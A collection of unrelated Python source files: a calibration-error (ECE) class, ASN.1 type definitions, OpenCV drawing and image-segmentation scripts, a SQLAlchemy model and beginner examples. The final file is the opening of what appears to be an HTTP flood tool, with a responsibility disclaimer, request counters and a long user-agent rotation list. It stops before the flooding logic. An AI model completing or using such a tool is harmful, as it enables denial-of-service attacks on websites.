ax.add_patch( lhs )
ax.add_patch( rhs )
ax.add_patch( cy )
ax.add_patch( cybase )
ax.add_patch( cycut )
z = np.linspace( -sz, sz, 100 )
dz = cz
rz = hyp.rz(z)
ax.plot( rz, z + dz, c="b")
ax.plot( -rz, z + dz, c="b")
fig.show()
|
import numpy as np
class ECE:
def __init__(self, n_bin, dynamic=False):
self.n_bin = n_bin
self.dynamic = dynamic
if dynamic:
self.list = []
self.bin_lowers = np.zeros(n_bin)
self.bin_uppers = np.zeros(n_bin)
else:
bin_boundaries = np.linspace(0, 1, n_bin+1)
self.bin_lowers = bin_boundaries[:-1]
self.bin_uppers = bin_boundaries[1:]
self.ece_mat = None
def compute_acc_conf(self, y_pred, y_true, conf):
acc = np.equal(y_true, y_pred)
acc_conf = np.zeros((self.n_bin, 3))
for i, (bin_lower, bin_upper) in enumerate(zip(self.bin_lowers, self.bin_uppers)):
in_bin = (conf > bin_lower.item()) & (conf <= bin_upper.item())
if i == 0:
in_bin |= (conf == 0)
acc_conf[i, 0] = in_bin.astype(float).sum()
if acc_conf[i, 0] > 0:
acc_conf[i, 1] = acc[in_bin].astype(float).sum()
acc_conf[i, 2] = conf[in_bin].astype(float).sum()
n_total_data = np.sum(acc_conf, axis=0)[0]
assert n_total_data == y_true.shape[0]
return acc_conf
def split_dynamic_bin(self):
acc_conf = np.zeros((self.n_bin, 3))
samples_in_bin = len(self.list) // self.n_bin
rest_samples = len(self.list) % self.n_bin
end_idx = 0
for i in range(self.n_bin):
start_idx = end_idx
end_idx = start_idx + samples_in_bin + (1 if i < rest_samples else 0)
temp_arr = np.array(self.list[start_idx: end_idx])
correct = (temp_arr[:, 0] == temp_arr[:, 1]).sum()
conf = temp_arr[:, 2].sum()
acc_conf[i, 0] = end_idx - start_idx
acc_conf[i, 1] = correct
acc_conf[i, 2] = conf
self.bin_lowers[i] = temp_arr[:, 2].min() # TODO: need to minus epsilon?
self.bin_uppers[i] = temp_arr[:, 2].max()
return acc_conf
def get_ECE_mat(self):
res_mat = np.copy(self.ece_mat)
ind = res_mat[:, 0] > 0
res_mat[ind, 1] = np.divide(res_mat[ind, 1], res_mat[ind, 0])
res_mat[ind, 2] = np.divide(res_mat[ind, 2], res_mat[ind, 0])
res_mat[:, 0] = np.divide(res_mat[:, 0], np.sum(res_mat[:, 0]))
return res_mat
def compute_ECE(self):
res_mat = np.copy(self.ece_mat)
ind = res_mat[:, 0] > 0
res_mat[ind, 1] = np.divide(res_mat[ind, 1], res_mat[ind, 0])
res_mat[ind, 2] = np.divide(res_mat[ind, 2], res_mat[ind, 0])
res_mat[:, 0] = np.divide(res_mat[:, 0], np.sum(res_mat[:, 0]))
res = np.sum(np.multiply(res_mat[:,0], np.absolute(res_mat[:,1]-res_mat[:,2])))
return res
def compute_MCE(self):
res_mat = np.copy(self.ece_mat)
ind = res_mat[:, 0] > 0
res_mat[ind, 1] = np.divide(res_mat[ind, 1], res_mat[ind, 0])
res_mat[ind, 2] = np.divide(res_mat[ind, 2], res_mat[ind, 0])
res_mat[:, 0] = np.divide(res_mat[:, 0], np.sum(res_mat[:, 0]))
res = np.max(np.absolute(res_mat[:, 1] - res_mat[:, 2]))
return res
def compute_VCE(self):
ece = self.compute_ECE()
res_mat = np.copy(self.ece_mat)
ind = res_mat[:, 0] > 0
res_mat[ind, 1] = np.divide(res_mat[ind, 1], res_mat[ind, 0])
res_mat[ind, 2] = np.divide(res_mat[ind, 2], res_mat[ind, 0])
res_mat[:, 0] = np.divide(res_mat[:, 0], np.sum(res_mat[:, 0]))
res = np.sum(np.multiply(res_mat[:,0], np.square(np.absolute(res_mat[:,1]-res_mat[:,2]) - ece)))
return res
def add_data(self, y_pred, y_true, conf):
if self.dynamic:
cur_list = [(p, t, c,) for (p, t, c) in zip(y_pred, y_true, conf)]
self.list = self.list + cur_list
self.list = sorted(self.list, key=lambda x: x[2])
self.ece_mat = self.split_dynamic_bin()
else:
temp_mat = self.compute_acc_conf(y_pred, y_true, conf)
if self.ece_mat is None:
self.ece_mat = temp_mat
else:
self.ece_mat = self.ece_mat + temp_mat
if __name__ == '__main__':
e = ECE(15)
y_pred = np.array([0,1,2,3,4,5,1,2])
y_true = np.array([0,1,2,2,2,3,1,2])
conf = np.array([0.4,0.2,0.3,0.5,0.3,0.7,0.8,0.3])
e.add_data(y_pred,y_true, conf)
print(e.ece_mat)
c = e.compute_ECE()
print(c)
|
from pyasn1.type.namedtype import NamedType, NamedTypes, OptionalNamedType, DefaultedNamedType
from pyasn1.type.namedval import NamedValues
from asn1PERser.classes.data.builtin import *
from asn1PERser.classes.types.type import AdditiveNamedTypes
from asn1PERser.classes.types.constraint import MIN, MAX, NoConstraint, ExtensionMarker, SequenceOfValueSize, \
ValueRange, SingleValue, ValueSize, ConstraintOr, ConstraintAnd
minNumber = IntegerType(-10)
maxNumber = IntegerType(255)
class MyBitString(BitStringType):
subtypeSpec = ValueSize(1, maxNumber, extensionMarker=True)
class TcpData(IntegerType):
pass
class SrcUdpTput(IntegerType):
pass
class TgtUdpTput(IntegerType):
pass
class InnerSequence(SequenceType):
rootComponent = AdditiveNamedTypes(
NamedType('i0', IntegerType()),
NamedType('i1', IntegerType()),
)
componentType = rootComponent
class MySeq1(SequenceType):
class data(ChoiceType):
class my_int_2(IntegerType):
subtypeSpec = ValueRange(1, 2)
rootComponent = AdditiveNamedTypes(
NamedType('inner-seq', InnerSequence()),
NamedType('my-int-1', IntegerType()),
NamedType('my-int-2', my_int_2()),
NamedType('my-bit', MyBitString()),
)
componentType = rootComponent
class my_int_3(IntegerType):
subtypeSpec = ValueRange(10, 20)
rootComponent = AdditiveNamedTypes(
NamedType('data', data()),
NamedType('my-int-3', my_int_3()),
NamedType('my-octet', OctetStringType()),
)
componentType = rootComponent
class MySeq2(SequenceType):
class enum_one(EnumeratedType):
subtypeSpec = ExtensionMarker(True)
enumerationRoot = NamedValues(
('one', 0),
('two', 1),
)
namedValues = enumerationRoot
class o1(OctetStringType):
subtypeSpec = ValueSize(1, 10)
rootComponent = AdditiveNamedTypes(
NamedType('i0', IntegerType()),
NamedType('enum-one', enum_one()),
NamedType('o1', o1()),
)
componentType = rootComponent
class SrcTcpData(SequenceType):
class data(SequenceOfType):
subtypeSpec = SequenceOfValueSize(1, maxNumber)
componentType = TcpData()
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('data', data()),
)
componentType = rootComponent
class TgtTcpData(SequenceType):
class data(SequenceOfType):
subtypeSpec = SequenceOfValueSize(1, maxNumber)
componentType = TcpData()
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('data', data()),
)
componentType = rootComponent
class SrcUdpData(SequenceType):
class data(SequenceOfType):
subtypeSpec = SequenceOfValueSize(1, maxNumber)
componentType = SrcUdpTput()
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('data', data()),
)
componentType = rootComponent
class TgtUdpData(SequenceType):
class data(SequenceOfType):
subtypeSpec = SequenceOfValueSize(1, maxNumber)
componentType = TgtUdpTput()
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('data', data()),
)
componentType = rootComponent
class BigIpData(SequenceType):
class d0(IntegerType):
subtypeSpec = ValueRange(-1, 1)
class d1(OctetStringType):
subtypeSpec = ValueSize(1, 20)
rootComponent = AdditiveNamedTypes(
NamedType('d0', d0()),
NamedType('d1', d1()),
)
componentType = rootComponent
class IpData(SequenceType):
class data(SequenceOfType):
subtypeSpec = SequenceOfValueSize(1, maxNumber)
componentType = BigIpData()
subtypeSpec = ExtensionMarker(True)
rootComponent = AdditiveNamedTypes(
NamedType('data', data()),
)
componentType = rootComponent
class MyChoice(ChoiceType):
class enum_two(EnumeratedType):
enumerationRoot = NamedValues(
('three', 0),
('four', 1),
)
namedValues = enumerationRoot
class inner_seq_2(SequenceType):
class i1(BitStringType):
subtypeSpec = ValueSize(1, 2)
rootComponent = AdditiveNamedTypes(
NamedType('i0', IntegerType()),
NamedType('i1', i1()),
)
componentType = rootComponent
class o1(OctetStringType):
subtypeSpec = ValueSize(1, 10)
rootComponent = AdditiveNamedTypes(
NamedType('enum-two', enum_two()),
NamedType('inner-seq-2', inner_seq_2()),
NamedType('o1', o1()),
NamedType('my-int-4', IntegerType()),
)
componentType = rootComponent
|
import cv2
resizeFactor = 0.5
circle_radius = 2
def draw_points(means, image_filename, output_filename, color):
orig = cv2.imread(image_filename)
resize = cv2.resize(orig, (0, 0), fx=resizeFactor, fy=resizeFactor)
for mean in means:
x, y = mean[0], mean[1]
cv2.circle(resize, (x, y), circle_radius, color, thickness=3)
cv2.imwrite(output_filename, resize)
def draw_point_sets(point_sets, image_filename, output_filename, colors):
orig = cv2.imread(image_filename)
resize = cv2.resize(orig, (0, 0), fx=resizeFactor, fy=resizeFactor)
for i, point_set in enumerate(point_sets):
for mean in point_set:
x, y = mean[0], mean[1]
cv2.circle(resize, (x, y), circle_radius, colors[i], thickness=3)
cv2.imwrite(output_filename, resize)
|
def find_indices(N,m):
# first find the semi triangle
# number in first row is N-2
# ALL INDICES ARE ARRAY STYLE, 0,1,..,M-1
# N is how many actual SNPs the search is going through, so it goes (0,1,2),...,(0,1,N-1)
# m is how many triples each thread will be searching.
m_orig = m
triangle_cumsum = 0
current_count = 0
file = open('indexes.txt','w')
newIndex = (0,1,2)
for i in range(N-2,0,-1): # i = 4,3,2,1
old_triangle_cumsum = triangle_cumsum
triangle_cumsum = triangle_cumsum + i*(i+1)/2
triangle_index = (N-2)-i
triangle_rows = i
if (triangle_cumsum >= m):
# now find exact row of this triangle
# how many times do i need to keep subtracting rows until i've gone too far
current_count = old_triangle_cumsum
for j in reversed(range(triangle_rows)): # 3,2,1,0
current_count = current_count + (j+1)
if(current_count >=m ):
#okay. it is the j+1th row
# now find how far along this row it is
for k in range(j+1):#
if (k +1 + current_count -(j+1)== m):
# we're done. Onto the next one.
# it's the (triangle_index)'th triangle,
# j'th row from the bottom
# and the k'th one
# so (triangle_index,N-2-j,N-2-j + 1 + k)
oldIndex = newIndex
newIndex = (triangle_index, N-2-j,N-2-j+1+k)
file.write(str(oldIndex[0]) + ',' + str(oldIndex[1]) + ',' + str(oldIndex[2]) +
',' + str(newIndex[0]) + ',' + str(newIndex[1]) + ',' + str(newIndex[2]) + '\n')
m = m + m_orig
if newIndex != (N-3,N-2,N-1):
file.write(str(newIndex[0]) + ',' + str(newIndex[1]) + ',' + str(newIndex[2]) +
',' + str(N-3) + ',' + str(N-2) + ',' + str(N-1) + '\n')
file.close()
return 0
if __name__ == "__main__":
N = 99
m = 10000
find_indices(N,m)
|
from sqlalchemy import Column, Integer, String
from bitcoin_acks.database.base import Base
class PullRequestsLabels(Base):
__tablename__ = 'pull_requests_labels'
id = Column(Integer, primary_key=True)
pull_request_id = Column(String)
label_id = Column(String)
|
list=[10,20,30,40,50]
sum=int()
for x in list:
sum=sum+x
print(sum)
|
l = ["Bob", "Rolf", "Anne"]
t = ("Bob", "Rolf", "Anne")
# Can't modify a tuple
s = {"Bob", "Rolf", "Anne"}
# Can't have duplicate elements
# Order is not guaranteed
l.append("Smith")
# t.append("Smith")
# Tuples cannot be modified
s.add("Smith")
s.add("Bob")
# Only 1 bob will be printed, curiously, first bob was deleted
print(l)
print(t)
print(s)
|
import numpy as np
import os
import cv2
import scipy.io as sio
import sklearn.metrics.pairwise as pw
from scipy.spatial import distance_matrix
import matplotlib.pyplot as plt
from Cluster import Kmeans, NormCut
def displayImageGT (f):
path = img_dir + f # get full path of file
img = cv2.imread(path, -1) # read image in path
cv2.imshow('image', img) # show groundTruth as an image
cv2.waitKey(0) # wait for a key press
img = cv2.resize(img, (0, 0), None, .5, .5)
# show ground truths of image
filename = f.split('.')[0] # getting filename without
gt_file = './groundTruth/test/' + filename + '.mat'
mat = sio.loadmat(gt_file) # load mat file
gt_size = mat['groundTruth'].size
print gt_size
for i in range(0, gt_size):
gt = mat['groundTruth'][0, i] # fetch groundTruth
bound = gt['Boundaries'][0][0] # fetch boundaries in each groundTruth
seg = gt['Segmentation'][0][0]
plt.imshow(seg)
plt.show()
print bound
bound = 255 - bound * 255 # convert numbers from (0, 1) to (0, 255)
bound_bgr = cv2.cvtColor(bound, cv2.COLOR_GRAY2BGR) #convert image into 3-channel (BGR)
bound_bgr = cv2.resize(bound_bgr, (0, 0), None, .5, .5) #resize the image into half of its size
img = np.concatenate((img, bound_bgr), axis=1) #concatenate the image and its ground truth
cv2.imshow('image', img) # show groundTruth as an image
cv2.waitKey(0) # wait for a key press
#=======================================================================================================================
def KNN(D, k):
dist = distance_matrix(D, D)
min_dist = np.argsort(dist, axis=1)[:, 1:k+1]
A = np.zeros([D.shape[0], D.shape[0]])
for i in range(0, D.shape[0]):
for j in range(0, k):
A[i, min_dist[i, j]] = 1
return A
#=======================================================================================================================
#display all pictures in folder test
img_dir = './images1/test/' # path of folder test
kmeans_dir = './images1/K-means Segmentation/'
nc_dir1 = './images1/NormCut Segmentation/RBF1/'
nc_dir2 = './images1/NormCut Segmentation/RBF2/'
nc_dir3 = './images1/NormCut Segmentation/KNN/'
num = 0
for root, dirs, filenames in os.walk(img_dir): # get all filenames in dir
for f in filenames: # display each picture and its ground truth
if f != 'Thumbs.db':
#show original image
#displayImageGT(f)
num += 1
filename = f.split('.')[0]
path = img_dir + f # get full path of file
img = cv2.imread(path, -1) # read image in path
print '\n\nImage #' + str(num) + ' has been read'
data1 = img.reshape(img.shape[0] * img.shape[1], 3)
print data1.shape
print 'Resizing Image'
img2 = cv2.resize(img, (0, 0), None, .25, .25)
data2 = img2.reshape(img2.shape[0] * img2.shape[1], 3)
print data2.shape
print 'Starting Clustering Algorithm\n'
K = [3, 5, 7, 9, 11]
for k in K:
print '\nK = ' + str(k)
kmeans_path = kmeans_dir + str(k) + '/' + filename
nc_path1 = nc_dir1 + str(k) + '/' + filename
nc_path2 = nc_dir2 + str(k) + '/' + filename
nc_path3 = nc_dir3 + str(k) + '/' + filename
#print '\nStarting K-means Algorithm'
#[C, segmentation] = Kmeans(data1, k)
#out = np.matrix(segmentation).reshape(img.shape[0], img.shape[1])
#np.save(kmeans_path, out)
#print 'K-means Clustering has finished. The clusters are:'
#for j in range(0, k):
# print 'Cluster #' + str(j)
# print len(C[j])
#==========================================================================
print '\nCreating Similarity Matrix (RBF gamma = 1)'
A = pw.rbf_kernel(data2, gamma=1)
print 'Starting Normalized Cut Algorithm'
[C, segmentation] = NormCut(A, k)
out = np.matrix(segmentation).reshape(img2.shape[0], img2.shape[1])
np.save(nc_path1 , out)
print 'Normalized Cut (RBF gamma = 1) has finished. The clusters are:'
for j in range(0, k):
print 'Cluster #' + str(j)
print len(C[j])
#============================================================================
print '\nCreating Similarity Matrix (RBF gamma = 10)'
A = pw.rbf_kernel(data2, gamma=10)
print 'Starting Normalized Cut Algorithm'
[C, segmentation] = NormCut(A, k)
out = np.matrix(segmentation).reshape(img2.shape[0], img2.shape[1])
np.save(nc_path2, out)
print 'Normalized Cut (RBF gamma = 10) has finished. The clusters are:'
for j in range(0, k):
print 'Cluster #' + str(j)
print len(C[j])
#=============================================================================
print '\nCreating Similarity Matrix (5-NN)'
A = KNN(data2, 5)
print 'Starting Normalized Cut Algorithm'
[C, segmentation] = NormCut(A, k)
out = np.matrix(segmentation).reshape(img2.shape[0], img2.shape[1])
np.save(nc_path3, out)
print 'Normalized Cut (5-NN) has finished. The clusters are:'
for j in range(0, k):
print 'Cluster #' + str(j)
print len(C[j])
|
# -*- coding: utf-8 -*-
print '---------------------------------------------------'
print 'bu script aeren7318 tarafından yapıldı calanların amk'
print 'hiçbir sorumluluk bana ait degil'
print '---------------------------------------------------'
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Bloglines/3.1 (http://www.bloglines.com)')
headers_useragents.append('CSSCheck/1.2.2')
headers_useragents.append('Dillo/2.0')
headers_useragents.append('DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)')
headers_useragents.append('DoCoMo/2.0 SH901iC(c100;TB;W24H12)')
headers_useragents.append('Download Demon/3.5.0.11')
headers_useragents.append('ELinks/0.12~pre5-4')
headers_useragents.append('ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)')
headers_useragents.append('ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)')
headers_useragents.append('EmailWolf 1.00')
headers_useragents.append('everyfeed-spider/2.0 (http://www.everyfeed.com)')
headers_useragents.append('facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)')
headers_useragents.append('FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)')
headers_useragents.append('FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)')
headers_useragents.append('Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a')
headers_useragents.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2')
headers_useragents.append('Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0')
headers_useragents.append('Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34')
headers_useragents.append('Links/0.9.1 (Linux 2.4.24; i386;)')
headers_useragents.append('Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)')
headers_useragents.append('Links (2.1pre15; Linux 2.4.26 i686; 158x61)')
headers_useragents.append('Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)')
headers_useragents.append('Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12')
headers_useragents.append('Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d')
headers_useragents.append('Mediapartners-Google')
headers_useragents.append('Microsoft URL Control - 6.00.8862')
headers_useragents.append('Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2)')
headers_useragents.append('MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0')
headers_useragents.append('MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0')
headers_useragents.append('MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0')
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0')
headers_useragents.append('SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0')
headers_useragents.append('SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonT100/R101')
headers_useragents.append('SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0')
headers_useragents.append('SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0')
headers_useragents.append('SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Wget/1.9.1)')
headers_useragents.append('wii libnup/1.0')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US)')
headers_useragents.append('SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0')
headers_useragents.append('SuperBot/4.4.0.60 (Windows XP)')
headers_useragents.append('Uzbl (Webkit 1.3) (Linux i686 [i686])')
headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1')
headers_useragents.append('W3C_Validator/1.654')
headers_useragents.append('w3m/0.5.1')
headers_useragents.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
headers_useragents.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
headers_useragents.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
headers_useragents.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
headers_useragents.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
headers_useragents.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
headers_useragents.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
headers_useragents.append('WDG_Validator/1.6.2')
headers_useragents.append('WebCopier v4.6)')
headers_useragents.append('Web Downloader/6.9)')
headers_useragents.append('WebZIP/3.5 (http://www.spidersoft.com')
headers_useragents.append('Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30')
headers_useragents.append('Opera/7.50 (Windows ME; U) [en]')
headers_useragents.append('Opera/7.50 (Windows XP; U)')
headers_useragents.append('Opera/7.51 (Windows NT 5.1; U) [en]')
headers_useragents.append('Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr')
headers_useragents.append('Opera/9.0 (Macintosh; PPC Mac OS X; U; en)')
headers_useragents.append('Opera/9.20 (Macintosh; Intel Mac OS X; U; en)')
headers_useragents.append('Opera/9.25 (Windows NT 6.0; U; en)')
headers_useragents.append('Opera/9.30 (Nintendo Wii; U; ; 2047-7; en)')
headers_useragents.append('Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en)')
headers_useragents.append('Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0')
headers_useragents.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0')
headers_useragents.append('Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1')
headers_useragents.append('Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0')
headers_useragents.append('Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00')
headers_useragents.append('Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52')
headers_useragents.append('Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61')
headers_useragents.append('Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00')
headers_useragents.append('Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00')
headers_useragents.append('Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10')
headers_useragents.append('Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01')
headers_useragents.append('Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00')
headers_useragents.append('Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10')
headers_useragents.append('Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00')
headers_useragents.append('msnbot/0.11 ( http://search.msn.com/msnbot.htm)')
headers_useragents.append('msnbot/1.0 ( http://search.msn.com/msnbot.htm)')
headers_useragents.append('msnbot/1.1 ( http://search.msn.com/msnbot.htm)')
headers_useragents.append('NetSurf/1.2 (NetBSD; amd64)')
headers_useragents.append('Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0')
headers_useragents.append('Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0')
headers_useragents.append('Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1')
headers_useragents.append('Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0')
headers_useragents.append('NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0')
headers_useragents.append('NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1')
headers_useragents.append('Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1')
